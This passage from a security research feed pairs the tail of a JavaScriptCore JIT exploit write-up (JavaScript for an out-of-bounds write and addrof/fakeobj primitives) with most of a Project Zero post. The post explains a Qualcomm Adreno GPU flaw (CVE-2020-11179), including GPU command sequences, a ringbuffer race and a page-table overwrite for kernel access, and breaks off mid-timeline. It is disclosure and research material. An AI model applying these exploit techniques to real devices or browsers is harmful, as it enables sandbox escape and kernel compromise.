                // In the last iteration, this will turn INT_MIN 
                // into an arbitrary, positive number since the
                // ArithAdd has been made unchecked by integer range
                // optimization (as it believes i to be a positive
                // number) and so doesn't bail out when overflowing
                // int32.
                i += -0x7ffffff9;
            }

            // This conditional branch is now necessary due to 
            // the subtraction above. Otherwise, 
            // IntegerRangeOptimization couldn’t prove that i 
            // was always positive.
            if (i > 0) {
                // In here, IntegerRangeOptimization again believes
                // i to be in the range [0, arr.length) and thus
                // eliminates the CheckBounds node, leading to a 
                // controlled OOB access. This write will then corrupt
                // the header of the following JSArray, setting its
                // length and capacity to 0x1337.
                arr[i] = 1.04380972981885e-310;
            }
        }
    }
}

Addrof/Fakeobj

At this point, the two low-level exploit primitives addrof and fakeobj can be constructed. The addrof(obj) primitive returns the address (as double) of the given JavaScript object in memory:

    let obj = {a: 42};
    let addr = addrof(obj);
    // 2.211548541e-314 (0x000000010acdc250 as 64bit integer)

 The fakeobj(addr) primitive returns a JSValue containing the given address as payload:

    let obj2 = fakeobj(addr);
    obj2 === obj;
    // true

These primitives are useful as they basically allow two things: breaking heap ASLR so that controlled data can be placed at a known address and providing a way to construct and “inject” fake objects into the engine. But more on exploitation in part 2.

The two primitives can be constructed with two JSArrays with different storage types: by overlapping a JSArray which stores (unboxed/raw) doubles with a JSArray that stores JSValues (boxed/tagged values that can for example be pointers to JSObjects): 

Image: An arrangement of two adjacent JSArray objects in memory


This then allows reading/writing pointer values in obj_arr as doubles through float_arr:

    let noCoW = 13.37;
    let target = [noCoW, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6];
    let float_arr = [noCoW, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6];
    let obj_arr = [{}, {}, {}, {}, {}, {}, {}];

    // Trigger the bug to write past the end of the target array and
    // thus corrupting the length of the float_arr following it
    hax(target, n);

    assert(float_arr.length == 0x1337);

    // (OOB) index into float_arr that overlaps with the first element    
    // of obj_arr.
    const OVERLAP_IDX = 8;

    function addrof(obj) {
        obj_arr[0] = obj;
        return float_arr[OVERLAP_IDX];
    }

    function fakeobj(addr) {
        float_arr[OVERLAP_IDX] = addr;
        return obj_arr[0];
    }

Note the somewhat unintuitive use of the noCoW variable. It is used to prevent JSC from allocating the arrays as copy-on-write arrays, which would otherwise result in the wrong heap layout.

Conclusion

I hope this was already an interesting walkthrough of a “non-standard” JIT compiler bug. Please keep in mind that there are many (JIT) vulnerabilities that are much easier to exploit. On the other hand, the fact that exploitation (up to this point) wasn’t trivial also allowed touching on numerous JSC and JIT compiler internals along the way.

Part 2 will show different ways of achieving an arbitrary read/write primitive from the addrof and fakeobj primitives.
✇Google Project Zero

Attacking the Qualcomm Adreno GPU

By: Tim

Posted by Ben Hawkes, Project Zero


When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a wide range of remote attacks that give you code execution with the privileges of an application (like the browser or a messaging application), but a sandbox escape is still required to gain full system access.


This blog post focuses on an interesting attack surface that is accessible from the Android application sandbox: the graphics processing unit (GPU) hardware. We describe an unusual vulnerability in Qualcomm's Adreno GPU, and how it could be used to achieve kernel code execution from within the Android application sandbox.


This research was built upon the work by Guang Gong (@oldfresher), who reported CVE-2019-10567 in August 2019. One year later, in early August 2020, Guang Gong released an excellent whitepaper describing CVE-2019-10567, and some other vulnerabilities that allowed full system compromise by a remote attacker. 


However in June 2020, I noticed that the patch for CVE-2019-10567 was incomplete, and worked with Qualcomm's security team and GPU engineers to fix the issue at its root cause. The patch for this new issue, CVE-2020-11179, has been released to OEM vendors for integration. It's our understanding that Qualcomm will list this publicly in their November 2020 bulletin.


Qualcomm provided the following statement:


"Providing technologies that support robust security and privacy is a priority for Qualcomm Technologies. We commend the security researchers from Google Project Zero for using industry-standard coordinated disclosure practices. Regarding the Qualcomm Adreno GPU vulnerability, we have no evidence it is currently being exploited, and Qualcomm Technologies made a fix available to OEMs in August 2020. We encourage end users to update their devices as patches become available from their carrier or device maker and to only install applications from trusted locations such as the Google Play Store."


Android Attack Surface


The Android application sandbox is an evolving combination of SELinux, seccomp BPF filters, and discretionary access control based on a unique per-application UID. The sandbox is used to limit the resources that an application has access to, and to reduce attack surface. There are a number of well-known routes that attackers use to escape the sandbox, such as: attacking other apps, attacking system services, or attacking the Linux kernel.


At a high-level, there are several different tiers of attack surface in the Android ecosystem. Here are some of the important ones:


  • Tier: Ubiquitous

Description: Issues that affect all devices in the Android ecosystem. 

Example: Core Linux kernel bugs like Dirty COW, or vulnerabilities in standard system services.


  • Tier: Chipset

Description: Issues that affect a substantial portion of the Android ecosystem, based on which type of hardware is used by various OEM vendors.

Example: Snapdragon SoC perf counter vulnerability, or Broadcom WiFi firmware stack overflow.


  • Tier: Vendor

Description: Issues that affect most or all devices from a particular Android OEM vendor

Example: Samsung kernel driver vulnerabilities


  • Tier: Device

Description: Issues that affect a particular device model from an Android OEM vendor

Example: Pixel 4 face unlock "attention aware" vulnerability


From an attacker's perspective, maintaining an Android exploit capability is a question of covering the widest possible range of the Android ecosystem in the most cost-effective way possible. Vulnerabilities in the ubiquitous tier are particularly attractive for affecting a lot of devices, but might be expensive to find and relatively short-lived compared to other tiers. The chipset tier will normally give you quite a lot of coverage with each exploit, but not as much as the ubiquitous tier. For some attack surfaces, such as baseband and WiFi attacks, the chipset tier is your primary option. The vendor and device tiers are easier to find vulnerabilities in, but require that a larger number of individual exploits are maintained.


For sandbox escapes, the GPU offers up a particularly interesting attack surface from the chipset tier. Since GPU acceleration is widely used in applications, the Android sandbox allows full access to the underlying GPU device. Furthermore, there are only two implementations of GPU hardware that are particularly popular in Android devices: ARM Mali and Qualcomm Adreno.


That means that if an attacker can find a nicely exploitable bug in these two GPU implementations, then they can effectively maintain an sandbox escape exploit capability against most of the Android ecosystem. Furthermore, since GPUs are highly complex with a significant amount of closed-source components (such as firmware/microcode), there is a good opportunity to find a reasonably powerful and long-lived vulnerability. 


Something Looks Weird


With this in mind, in late April 2020, I noticed the following commit in the Qualcomm Adreno kernel driver code:


From 0ceb2be799b30d2aea41c09f3acb0a8945dd8711 Mon Sep 17 00:00:00 2001

From: Jordan Crouse <[email protected]>

Date: Wed, 11 Sep 2019 08:32:15 -0600

Subject: [PATCH] msm: kgsl: Make the "scratch" global buffer use a random GPU address


Select a random global GPU address for the "scratch" buffer that is used

by the ringbuffer for various tasks.


When we think of adding entropy to addresses, we usually think of Address Space Layout Randomization (ASLR). But here we're talking about a GPU virtual address, not a kernel virtual address. That seems unusual, why would a GPU address need to be randomized? 


It was relatively straightforward to confirm that this commit was one of the security patches for CVE-2019-10567, which are linked in Qualcomm's advisory. A related patch was also included for this CVE:


From 8051429d4eca902df863a7ebb3c04cbec06b84b3 Mon Sep 17 00:00:00 2001

From: Jordan Crouse <[email protected]>

Date: Mon, 9 Sep 2019 10:41:36 -0600

Subject: [PATCH] msm: kgsl: Execute user profiling commands in an IB


Execute user profiling in an indirect buffer. This ensures that addresses

and values specified directly from the user don't end up in the

ringbuffer.


And so the question becomes, why exactly is it important that user content doesn't end up on the ringbuffer, and is this patch really sufficient to prevent that? And what happens if we can recover the base address of the scratch mapping? Both at least superficially looked to be possible, so this research project was off to a great start.


Before we go any further, let's take a step back and describe some of the basic components involved here: GPU, ringbuffer, scratch mapping, and so on.


Adreno Introduction


The GPU is the workhorse of modern graphics computing, and most applications use the GPU extensively. From the application's perspective, the specific implementation of GPU hardware is normally abstracted away by libraries such as OpenGL ES and Vulkan. These libraries implement a standard API for programming common GPU accelerated operations, such as texture mapping and running shaders. At a low level however, this functionality is implemented by interacting with the GPU device driver running in kernel space.




Specifically for Qualcomm Adreno, the /dev/kgsl-3d0 device file is ultimately used to implement higher level GPU functionality. The /dev/kgsl-3d0 file is directly accessible within the untrusted application sandbox, because:

  1. The device file has global read/write access set in its file permissions. The permissions are set by ueventd:


sargo:/ # cat /system/vendor/ueventd.rc | grep kgsl-3d0

/dev/kgsl-3d0             0666   system     system

  1. The device file has its SELinux label set to gpu_device, and the untrusted_app SELinux context has a specific allow rule for this label:

sargo:/ # ls -Zal /dev/kgsl-3d0

crw-rw-rw- 1 system system u:object_r:gpu_device:s0 239, 0 2020-07-21 

15:48 /dev/kgsl-3d0


[email protected]:~$ adb pull /sys/fs/selinux/policy

/sys/fs/selinux/policy: 1 file pulled, 0 skipped. 16.1 MB/s ...

[email protected]:~$ sesearch -A -s untrusted_app policy | grep gpu_device

allow untrusted_app gpu_device:chr_file { append getattr ioctl lock map

open read write };


This means that the application can open the device file. The Adreno "KGSL" kernel device driver is then primarily invoked through a number of different ioctl calls (e.g. to allocate shared memory, create a GPU context, submit GPU commands, etc.) and mmap (e.g. to map shared memory in to the userspace application).


GPU Shared Mappings


For the most part, applications use shared mappings to load vertices, fragments, and shaders into the GPU and to receive computed results. That means certain physical memory pages are shared between a userland application and the GPU hardware.  


To set up a new shared mapping, the application will ask the KGSL kernel driver for an allocation by calling the IOCTL_KGSL_GPUMEM_ALLOC ioctl. The kernel driver will prepare a region of physical memory, and then map this memory into the GPU's address space (for a particular GPU context, explained below). Finally, the application will map the shared memory into the userland address space by using an identifier returned from the allocation ioctl.


At this point, there are two distinct views on the same pages of physical memory. The first view is from the userland application, which uses a virtual address to access the memory that is mapped into its address space. The CPU's memory management unit (MMU) will perform address translation to find the appropriate physical page.


The other is the view from the GPU hardware itself, which uses a GPU virtual address. The GPU virtual address is chosen by the KGSL kernel driver, which configures the device's IOMMU (called the SMMU on ARM) with a page table structure that is used just for the GPU. When the GPU tries to read or write the shared memory mapping, the IOMMU will translate the GPU virtual address to a physical page in memory. This is similar to the address translation performed on the CPU, but with a completely different address space (i.e. the pointer value used in the application will be different to the pointer value used in the GPU).




Each userland process has its own GPU context, meaning that while a certain application is running operations on the GPU, the GPU will only be able to access mappings that it shares with that process. This is needed so that one application can't ask the GPU to read the shared mappings from another application. In practice this separation is achieved by changing which set of page tables is loaded into the IOMMU whenever a GPU context switch occurs. A GPU context switch occurs whenever the GPU is scheduled to run a command from a different process.


However certain mappings are used by all GPU contexts, and so can be present in every set of page tables. They are called global shared mappings, and are used for a variety of system and debugging functions between the GPU and the KGSL kernel driver. While they are never mapped directly into a userland application (e.g. a malicious application can't read or modify the contents of the global mappings directly), they are mapped into both the GPU and kernel address spaces.


On a rooted Android device, we can dump the global mappings (and their GPU virtual addresses) using the follow command:


sargo:/ # cat /sys/kernel/debug/kgsl/globals

0x00000000fc000000-0x00000000fc000fff             4096 setstate

0x00000000fc001000-0x00000000fc040fff           262144 gpu-qdss

0x00000000fc041000-0x00000000fc048fff            32768 memstore

0x00000000fce7a000-0x00000000fce7afff             4096 scratch

0x00000000fc049000-0x00000000fc049fff             4096 pagetable_desc

0x00000000fc04a000-0x00000000fc04afff             4096 profile_desc

0x00000000fc04b000-0x00000000fc052fff            32768 ringbuffer

0x00000000fc053000-0x00000000fc053fff             4096 pagetable_desc

0x00000000fc054000-0x00000000fc054fff             4096 profile_desc

0x00000000fc055000-0x00000000fc05cfff            32768 ringbuffer

0x00000000fc05d000-0x00000000fc05dfff             4096 pagetable_desc

0x00000000fc05e000-0x00000000fc05efff             4096 profile_desc

0x00000000fc05f000-0x00000000fc066fff            32768 ringbuffer

0x00000000fc067000-0x00000000fc067fff             4096 pagetable_desc

0x00000000fc068000-0x00000000fc068fff             4096 profile_desc

0x00000000fc069000-0x00000000fc070fff            32768 ringbuffer

0x00000000fc071000-0x00000000fc0a0fff           196608 profile

0x00000000fc0a1000-0x00000000fc0a8fff            32768 ucode

0x00000000fc0a9000-0x00000000fc0abfff            12288 capturescript

0x00000000fc0ac000-0x00000000fc116fff           438272 capturescript_regs

0x00000000fc117000-0x00000000fc117fff             4096 powerup_register_list

0x00000000fc118000-0x00000000fc118fff             4096 alwayson

0x00000000fc119000-0x00000000fc119fff             4096 preemption_counters

0x00000000fc11a000-0x00000000fc329fff          2162688 preemption_desc

0x00000000fc32a000-0x00000000fc32afff             4096 perfcounter_save_restore_desc

0x00000000fc32b000-0x00000000fc53afff          2162688 preemption_desc

0x00000000fc53b000-0x00000000fc53bfff             4096 perfcounter_save_restore_desc

0x00000000fc53c000-0x00000000fc74bfff          2162688 preemption_desc

0x00000000fc74c000-0x00000000fc74cfff             4096 perfcounter_save_restore_desc

0x00000000fc74d000-0x00000000fc95cfff          2162688 preemption_desc

0x00000000fc95d000-0x00000000fc95dfff             4096 perfcounter_save_restore_desc

0x00000000fc95e000-0x00000000fc95efff             4096 smmu_info


And suddenly our scratch buffer has appeared! To the left we see the GPU virtual addresses of each global mapping, then a size, and then the name of the allocation. By rebooting the device several times and checking the layout, we can see that the scratch buffer is indeed randomized:


0x00000000fc0df000-0x00000000fc0dffff             4096 scratch

...

0x00000000fcfc0000-0x00000000fcfc0fff             4096 scratch

...

0x00000000fc9ff000-0x00000000fc9fffff             4096 scratch

...

0x00000000fcb4d000-0x00000000fcb4dfff             4096 scratch


The same test reveals that the scratch buffer is the only global mapping that is randomized, all other global mappings have a fixed GPU address in the range [0xFC000000, 0xFD400000]. That makes sense, because the patch for CVE-2019-10567 only introduced the KGSL_MEMDESC_RANDOM flag for the scratch buffer allocation. 


So we now know that the scratch buffer is correctly randomized (at least to some extent), and that it is a global shared mapping present in every GPU context. But what exactly is the scratch buffer used for?


The Scratch Buffer


Diving in to the driver code, we can clearly see the scratch buffer being allocated in the driver's probe routines, meaning that the scratch buffer will be allocated when the device is first initialized:


int adreno_ringbuffer_probe(struct adreno_device *adreno_dev, bool nopreempt)

{

...

status = kgsl_allocate_global(device, &device->scratch,

                            PAGE_SIZE, 0, KGSL_MEMDESC_RANDOM, "scratch");


We also find this useful comment:


 /* SCRATCH MEMORY: The scratch memory is one page worth of data that

 *  is mapped into the GPU. This allows for some 'shared' data between

 *  the GPU and CPU. For example, it will be used by the GPU to write

 *  each updated RPTR for each RB.


By cross referencing all the usages of the resulting memory descriptor (device->scratch) in the kernel driver, we can find two primary usages of the scratch buffer:


  1. The GPU address of a preemption restore buffer is dumped to the scratch memory, which appears to be used if a higher priority GPU command interrupts a lower priority command.

  2. The read pointer (RPTR) of the ringbuffer (RB) is read from scratch memory and used when calculating the amount of free space in the ringbuffer.


Here we can start to connect the dots. Firstly, we know that the patch for CVE-2019-10567 included changes to both the scratch buffer and the ringbuffer handling code -- that suggests we should focus on the second use case above. 


If the GPU is writing RPTR values to the shared mapping (as the comment suggests), and if the kernel driver is reading RPTR values from the scratch buffer and using it for allocation size calculations, then what happens if we can make the GPU write an invalid or incorrect RPTR value?


Ringbuffer Basics


To understand what an invalid RPTR value might mean for a ringbuffer allocation, we first need to describe the ringbuffer itself. When a userland application submits a GPU command (IOCTL_KGSL_GPU_COMMAND), the driver code dispatches the command to the GPU via the ringbuffer, which uses a producer-consumer pattern. The kernel driver will write commands into the ringbuffer, and the GPU will read commands from the ringbuffer.


This occurs in a similar fashion to classical circular buffers. At a low level, the ringbuffer is a global shared mapping with a fixed size of 32768 bytes. Two indices are maintained to track where the CPU is writing to (WPTR), and where the GPU is reading from (RPTR). To allocate space on the ringbuffer, the CPU has to calculate whether there is sufficient room between the current WPTR and the current RPTR. This happens in adreno_ringbuffer_allocspace:


unsigned int *adreno_ringbuffer_allocspace(struct adreno_ringbuffer *rb,

                unsigned int dwords)

{

        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);

        unsigned int rptr = adreno_get_rptr(rb); [1]

        unsigned int ret;


        if (rptr <= rb->_wptr) { [2]

                unsigned int *cmds;


                if (rb->_wptr + dwords <= (KGSL_RB_DWORDS - 2)) {

                        ret = rb->_wptr;

                        rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;

                        return RB_HOSTPTR(rb, ret);

                }

                

                /* 

                 * There isn't enough space toward the end of ringbuffer. So

                 * look for space from the beginning of ringbuffer upto the

                 * read pointer.

                 */

                if (dwords < rptr) {

                        cmds = RB_HOSTPTR(rb, rb->_wptr);

                        *cmds = cp_packet(adreno_dev, CP_NOP,

                                KGSL_RB_DWORDS - rb->_wptr - 1);

                        rb->_wptr = dwords;

                        return RB_HOSTPTR(rb, 0);

                }

        }


        if (rb->_wptr + dwords < rptr) { [3]

                ret = rb->_wptr;

                rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;

                return RB_HOSTPTR(rb, ret); [4]

        }


        return ERR_PTR(-ENOSPC);

}


unsigned int adreno_get_rptr(struct adreno_ringbuffer *rb)

{

        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);

        unsigned int rptr = 0;

...

                struct kgsl_device *device = KGSL_DEVICE(adreno_dev);


                kgsl_sharedmem_readl(&device->scratch, &rptr,

                                SCRATCH_RPTR_OFFSET(rb->id)); [5]

...

        return rptr;

}


We can see the RPTR value being read at [1], and that it ultimately comes from a read of the scratch global shared mapping at [5]. Then we can see the scratch RPTR value being used in two comparisons with the WPTR value at [2] and [3]. The first comparison is for the case where the scratch RPTR is less than or equal to WPTR, meaning that there may be free space toward the end of the ringbuffer or at the beginning of the ringbuffer. The second comparison is for the case where the scratch RPTR is higher than the WPTR. If there's enough room between the WPTR and scratch RPTR, then we can use that space for an allocation.


So what happens if the scratch RPTR value is controlled by an attacker? In that case, the attacker could make either one of these conditions succeed, even if there isn't actually space in the ringbuffer for the requested allocation size. For example, we can make the condition at [3] succeed when it normally wouldn't by artificially increasing the value of the scratch RPTR, which at [4] results in returning a portion of the ringbuffer that overlaps the correct RPTR location. 


That means that an attacker could overwrite ringbuffer commands that haven't yet been processed by the GPU with incoming GPU commands! Or in other words, controlling the scratch RPTR value could desynchronize the CPU and GPU's understanding of the ringbuffer layout. That sounds like it could be very useful! But how can we overwrite the scratch RPTR value?


Attacking the Scratch RPTR Value


Since global shared mappings are not mapped into userland, an attacker cannot modify the scratch buffer directly from their malicious/compromised userland process. However we know that the scratch buffer is mapped into every GPU context, including any created by a malicious attacker. What if we could make the GPU hardware write a malicious RPTR value into the scratch buffer on our behalf?  


To achieve this, there are two fundamental steps. Firstly, we need to confirm that the mapping is writable by user-supplied GPU commands. Secondly, we need a way to recover the base GPU address of the scratch mapping. This latter step is necessary due to the recent addition of GPU address randomization for the scratch mapping.


So are all global shared mappings writable by the GPU? It turns out that not every global shared mapping can be written to by user-supplied GPU commands, but the scratch buffer can be. We can confirm this by using the sysfs debugging method above to find the randomized base of the scratch mapping, and then writing a short sequence of GPU commands to write a value to the scratch mapping:


    /* write a value to the scratch buffer at offset 256 */

    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);

    *cmds++ = 0x41414141;


    /* ensure that the write has taken effect */

    *cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);

    *cmds++ = 0x13;

    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);

    *cmds++ = 0x41414141;

    *cmds++ = 0xffffffff;

    *cmds++ = 0x1;

    

    /* write 1 to userland shared memory to signal success */

    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

    cmds += cp_gpuaddr(cmds, shared_mem_gpuaddr);

    *cmds++ = 0x1;


Each CP_* operation here is constructed in userspace and run on the GPU hardware. Typically OpenGL library methods and shaders would be translated to these raw operations by a vendor supported library, but an attacker can also construct these command sequences manually by setting up some GPU shared memory and calling IOCTL_KGSL_GPU_COMMAND. These operations aren't documented however, so behavior has to be inferred by reading the driver code and manual tests. Some examples are: 1) the CP_MEM_WRITE operation writes a constant value to a GPU address, 2) the CP_WAIT_REG_MEM operation stalls execution until a GPU address contains a certain constant value, and 3) the CP_MEM_TO_MEM copies data from one GPU address to another.


That means that we can be sure that the GPU successfully wrote to the scratch buffer by checking that the final write occurs (on a normal userland shared memory mapping) -- if the scratch buffer write wasn't successful, the CP_WAIT_REG_MEM operation would time out and no value would be written back.


It's also possible to confirm that the scratch buffer is writable by looking at how the page tables for the global shared mapping are set up in the kernel driver code. Specifically, since the call to kgsl_allocate_global doesn't have KGSL_MEMFLAGS_GPUREADONLY or KGSL_MEMDESC_PRIVILEGED flags set, the resulting mapping is writable by user-supplied GPU commands.


But if the scratch buffer's base address is randomized, how do we know where to write to? There were two approaches to recovering the base address of the scratch buffer.


The first approach is to simply take the GPU command we used above to confirm that the scratch buffer was writable, and turn it into a bruteforce attack. Since we know that global shared mappings have a fixed range, and we know that only the scratch buffer is randomized, we have a very small search space to explore. Once the other static global shared mapping locations are removed from consideration, there are only 2721 possible locations for the scratch page. On average, it took 7.5 minutes to recover the scratch buffer address on a mid-range smartphone device, and this time could likely be optimized further.


The second approach was even better. As mentioned above, the scratch buffer is also used for preemption. To prepare the GPU for preemption, the kernel driver calls the a6xx_preemption_pre_ibsubmit function, which inserts a number of operations into the ringbuffer. The details of those operations aren't very important for our attack, other than the fact that a6xx_preemption_pre_ibsubmit spilled a scratch buffer pointer to the ringbuffer as an argument to a CP_MEM_WRITE operation. 


Since the ringbuffer is a global mapping and readable by user-supplied GPU commands, it was possible to immediately extract the base of the scratch mapping by using a CP_MEM_TO_MEM command at the right offset into the ringbuffer (i.e. we copied the contents of the ringbuffer to an attacker controlled userland shared mapping, and the contents contained a pointer to the randomized scratch buffer).


Overwriting the Ringbuffer


Now that we know we can reliably control the scratch RPTR value, we can turn our attention to corrupting the contents of the ringbuffer. What exactly is contained in the ringbuffer, and what does overwriting it buy us?


There are actually four different ringbuffers, each used for different GPU priorities, but we only need one for this attack, so we choose the ringbuffer that gets used the least on a modern Android device in order to avoid any noise from other applications using the GPU (ringbuffer 0, which at the time wasn't used at all by Android). Note that the ringbuffer global shared mapping uses the KGSL_MEMFLAGS_GPUREADONLY flag, so an attacker cannot directly modify the ringbuffer contents, and we need to use the scratch RPTR primitive to achieve this.


Recall that the ringbuffer is used to send commands from the CPU to the GPU. In practice however, user-supplied GPU commands are never placed directly onto the ringbuffer. This is for two reasons: 1) space in the ringbuffer is limited, and user-supplied GPU commands can be very large, and 2) the ringbuffer is readable by all GPU contexts, and so we want to ensure that one process can't read commands from a different process.


Instead, a layer of indirection occurs, and user-supplied GPU commands are run after an "indirect branch" from the ringbuffer occurs. Conceptually system level commands are executed straight from the ringbuffer, and user level commands are run after an indirect branch into GPU shared memory. Once the user commands finish, control flow will return to the next ringbuffer operation. The indirect branch is performed with a CP_INDIRECT_BUFFER_PFE operation, which is inserted into the ringbuffer by adreno_ringbuffer_submitcmd. This operation takes two parameters, the GPU address of the branch target (e.g. a GPU shared memory mapping with user-supplied commands in it) and a size value.


Aside from the indirect branch operation, the ringbuffer contains a number of other GPU command setup and teardown operations, something a bit like the prologue and epilogue of a compiled function. This includes the preemption setup mentioned earlier, GPU context switches, hooks for performance monitoring, errata fixups, identifiers, and protected mode operations. When considering we have some sort of ringbuffer corruption primitive, protected mode operations certainly sound like a potential target area, so let's explore this further.


Protected Mode


When a user-supplied GPU command is running on the GPU, it runs with protected mode enabled. This means that certain global shared mappings and certain GPU register ranges cannot be accessed (read or written). It turns out that this is critically important to the security model of the GPU architecture.


If we examine the driver code for all instances of protected mode being disabled (using the CP_SET_PROTECTED_MODE operation), we see just a handful of examples. Operations related to preemption, errata fixups, performance counters, and GPU context switches can all potentially run with protected mode disabled.


This last operation, GPU context switches, sounds particularly interesting. As a reminder, the GPU context switch occurs when two different processes are using the same ringbuffer. Since the GPU commands from one process aren't allowed to operate on the shared memory belonging to another process, the context switch is needed to switch out the page tables that the GPU has loaded.


What if we could make the GPU switch to an attacker controlled page table? Not only would our GPU commands be able to read and write shared mappings from other processes, we would be able to read and write to any physical address in memory, including kernel memory!


This is an intriguing proposition, and looking at how the kernel driver sets up the context switch operations in the ringbuffer, it looks alluringly possible. Based on a cursory review of the driver code, it looks like the GPU has an operation to switch page tables called CP_SMMU_TABLE_UPDATE. It's possible that this design was chosen for performance considerations, as it means that the GPU can perform a context switch without having to interrupt the kernel and wait for the IOMMU to be reconfigured -- it can simply reconfigure itself.


Looking further, it looks like the GPU has the IOMMU's "TTBR0" register mapped to a protected mode GPU register as well. By reading the ARM address translation and IOMMU documentation, we can see that TTBR0 is the base address of the page tables used for translating GPU addresses to physical memory addresses. That means if we can point TTBR0 to a set of malicious page tables, then we can translate any GPU address to any physical address of our choosing. 


And suddenly, we have a clear idea of how the original attack in CVE-2019-10567 worked. Recall that aside from randomizing the scratch buffer location, the patch for CVE-2019-10567 also "ensures that addresses and values specified directly from the user don't end up in the ringbuffer". 


We can now study Guang Gong's whitepaper and confirm that his attack managed to use the RPTR corruption technique (at the time using the static address of the scratch buffer) to smuggle operations into the ringbuffer via the arguments to performance profiling commands, which would then be executed due to clever alignment with the "true" RPTR value on the GPU. The smuggled operations disabled protected mode and branched to attacker controlled GPU commands, which promptly overwrote TTBR0 to gain a R/W primitive to arbitrary physical memory. Amazing!


Recovering the Attack


Since we have already bypassed the first part of the patch for CVE-2019-10567 (randomizing the scratch buffer base), to recover the attack (i.e. to be able to use a modified TTBR0 to write physical memory), we simply need to bypass the second part as well.


In essence the second part of the patch for CVE-2019-10567 prevented attacker-controlled commands from being written to the ringbuffer, particularly by the profiling subsystem. The obvious path to bypassing this fix would be to find a different way to smuggle attacker-controlled commands. While there were some exciting looking avenues (such as using the user-supplied GPU address as a command opcode), I decided to pursue a different approach.


Rather than inserting attacker controlled commands to the ringbuffer, let's use the RPTR ringbuffer corruption primitive to desynchronize and reorder legitimate ringbuffer operations. The two basic ingredients we need is an operation that disables protected mode, and an operation that calls an indirect branch -- both of which occur organically within the GPU kernel driver code.


The typical pattern for protected mode operations is to 1) drop protected mode, 2) perform some privileged operations, and 3) re-enable protected mode. Therefore, to recover the attack, we can perform a race condition between steps 1 and 3.  We can start the execution of a privileged operation such as a GPU context switch, and while it is still executing on the GPU with protected mode disabled, we can overwrite the privileged operations using the RPTR ringbuffer corruption primitive, essentially replacing the GPU context switch with an attacker-controlled indirect branch.



In order to win the race condition, we have to write an attacker controlled indirect branch to the correct offset in the ringbuffer (e.g. the offset of a context switch), and we need to time this write operation so that the GPU command processor has executed the operation to disable protected mode, but not yet executed the context switch itself. 


In practice this race condition appears to be highly feasible, and the temporal and spatial conditions are relatively stable. Specifically, by stalling the GPU with a wait command, and then synchronizing the context switch and the ringbuffer corruption primitives, we can establish a relative offset from the wait command where the GPU will first observe writes from the ringbuffer corruption. This discrete boundary likely results from caching behavior or a fixed-size internal prefetch buffer, and it makes it straightforward to calculate the correct layout of padding, payload, and context switch.


The race condition can be won at least 20% of the time, and since a failed attempt has no observable negative effects, the race condition can be repeated as many times as needed, which means that the attack can succeed almost immediately just by running the exploit in a loop. 


Once the attack succeeds, a branch to attacker supplied shared memory occurs while protected mode is disabled. This means that the TTBR0 register described above can be modified to point to an attacker controlled physical page that contains a fake page table structure. In the past (e.g. for rowhammer attacks) the setup of a known physical address has been achieved by using the ION memory allocator or spraying memory through the buddy allocator, and I found some straightforward success with the latter approach.


This allows the attacker to map a GPU address to an arbitrary physical address. At this point the attacker's GPU commands can overwrite kernel code or data structures to achieve arbitrary kernel code execution, which is straightforward since the kernel is located at a fixed physical address on Android kernels.


Final Attack


A proof-of-concept exploit called Adrenaline is available here. The proof-of-concept demonstrates the attack on a Pixel 3a device running sargo-user QQ2A.200501.001.B3 with kernel 4.9.200-gdf3ca60d978c-ab6351706. It overwrites an entry in the kernel's sys_call_table structure to show PC control.


Aside from the 20% success rate of winning the race condition discussed above, the proof-of-concept has two other areas of unreliability: 1) ringbuffer offsets aren't guaranteed to be the same across kernel versions, but should be stable once you calculate them (and could be calculated automatically), and 2) the spray technique used to allocate attacker-controlled data at a known physical address is very basic and used for demonstration purposes only, and there's a chance the chosen fixed page is already in-use. It should be possible to fix point 2 using ION or some other method. 


Patch Timeline


The reported issue was assigned CVE-2020-11179, and was patched by applying GPU firmware and kernel driver changes that enforce new restrictions on memory accesses to the scratch buffer by user-supplied GPU commands (i.e. the scratch buffer is protected while running indirect branches from the ringbuffer).



2020-06-08

Bug report sent to Qualcomm and filed Issue 2052 in the Project Zero issue tracker.

2020-06-08

Qualcomm acknowledges the report and assigns QPSIIR-1378 for tracking.

2020-06-12

Qualcomm agrees to schedule a meeting to discuss the reported issue.

2020-06-16

Project Zero and Qualcomm meet to discuss the attack and potential fixes.

2020-06-16

Additional PoC for the rptr bruteforce attack is shared with Qualcomm, as well as a potential bypass for one of the fix approaches that was discussed. Project Zero asks Qualcomm to coordinate with ecosystem partners as appropriate.

2020-06-23

Request for update regarding the potential fix bypass, fix timeline, and earlier request for coordination.

2020-06-25

Qualcomm confirms that the potential bypass can be resolved with a kernel driver patch, indicate that the patch is targeted for the August bulletin, and that Project Zero can ask Android Security to coordinate directly with Qualcomm.

2020-06-25

Project Zero informs Android Security that an issue exists and only provides a Qualcomm reference number. Project Zero asks Android Security to coordinate with Qualcomm for any further details.

2020-07-17

Qualcomm gives an update on the progress of a microcode based fix. The plan is that the fix will be available for OEMs by September 7, but Qualcomm will request an extension to patch integration and testing by OEMs.allow more time for patch integration and testing by OEMs.

2020-07-17

Project Zero responds by explaining the option and requirements for a 14-day grace period extension.

2020-07-29

Qualcomm confirms technical details of how the patch will work, and asks for a disclosure date of October 5th, and to withhold the PoC exploit if that's not possible.

2020-07-31

Project Zero reply to confirm a planned disclosure date of September 7 (based on policy). The PoC will be released on Sep 7, and that we predict a low likelihood of opportunistic reuse in the near-term due to the complexity of the exploit and additional R&D requirements for real-world usage.

2020-08-04

Qualcomm privately shares a security advisory with OEMs. OEMs can then request the fix to be applied to their branch/image.

2020-08-20

Qualcomm shares the current timeline with Project Zero, indicating that they were targeting a November public security bulletin release, and request a 14-day extension.

2020-08-25

Project Zero reiterates that a fix needs to be expected within the 14-day window for that extension option to apply.

2020-08-25

Qualcomm ask if any OEM shipping a fix within the 14-day window would be sufficient for the grace extension to be applied.

2020-08-26

